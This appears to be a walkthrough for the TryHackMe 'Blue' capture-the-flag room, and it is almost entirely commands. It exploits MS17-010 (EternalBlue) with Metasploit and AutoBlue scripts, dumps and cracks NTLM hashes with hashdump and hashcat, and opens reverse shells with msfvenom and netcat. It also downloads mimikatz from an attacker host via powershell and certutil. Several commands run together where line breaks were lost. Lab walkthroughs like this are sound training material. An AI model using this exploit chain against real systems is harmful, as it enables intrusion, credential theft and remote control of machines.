TryHackMe : Blue

  1. Scan the machine.
nmap -Pn <ip>
nmap -A -T 5 <ip> -vv
nmap --script vuln <ip> -vv
  1. Start Metasploit
msfconsole
search ms17–010
use 2
show options
set RHOSTS <target ip>
run
  1. If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
background
sessions
use multi/manage/shell_to_meterpreter
set LPORT 1234set SESSION 1
run
sessions
sessions 2
getsystem
shell
whoami
ps
migrate 708
  1. Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
hashdump
hashcat -a 0 -m 1000 hashforcrack.txt rockyou.txt --force --username --show____________________________________________________________________explaining
____________________________________________________________________
“-a 0” mean attack mode 0
“-m 1000” mean NTLM hash
“--force” mean my machine is not a native Intel OpenCL runtime. Need to force it.
"--username" mean ignore username in file
"--show" mean show cracked password
cat flag1.txt
cat flag2.txt
cat flag3.txt
git clone https://github.com/3ndG4me/AutoBlue-MS17-010cd AutoBlue-MS17-010
python eternal_checker.py <target ip>
cd shellcode./shell_prep.sh
1. would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y2. LHOST : <attacker ip>3. LPORT x64 : 44444. LPORT x86 : 55555. Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 16. Type 0 to generate a staged payload or 1 to generate a stageless payload : 0
nc -lvp 4444nc -lvp 5555
cd ..ls
python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin
python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin
cd shellcoderm sc*ls
./shell_prep.sh
1. would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y2. LHOST : <attacker ip>3. LPORT x64 : 88884. LPORT x86 : 99995. Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 16. Type 0 to generate a staged payload or 1 to generate a stageless payload : 1
nc -lvp 8888nc -lvp 9999
python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin
cd \dir flag* /s /b
python -m SimpleHTTPServer 1234
powershell -c "Invoke-WebRequest -OutFile mimikatz.exe http://<attacker ip>:<attacker port>/mimikatz.exe"
certutil.exe -urlcache -f http://<attacker ip>:<attacker port>/mimikatz.exe mimikatz.exe
dir
mimikatz.exelsadump::sam

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

【Data Analysis(5)】XGBoost Algorithm Predicts Returns (Part 1)

SMS Parsers

Application Containerization: Pros and Cons

PhishPhinder — A free, open-source tool for incident responders

Cara buat ultrasonik sensor menggunakan Arduino dan Blynk

Object detection using Cloudinary and OpenCV

Optimizing DynamoDB WCU utilization in EMR-Hive

Command Line Hacks | Linux | Unix | Windows

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ratiros01

ratiros01

OSCP

More from Medium

F1’s 2022 Australian Grand Prix Attendance Broken Down.

eCommerce EMAIL DEEP DIVE series: Cart Abandonment (4 of 10)

Colorado Denver Dispensary: A Simple Definition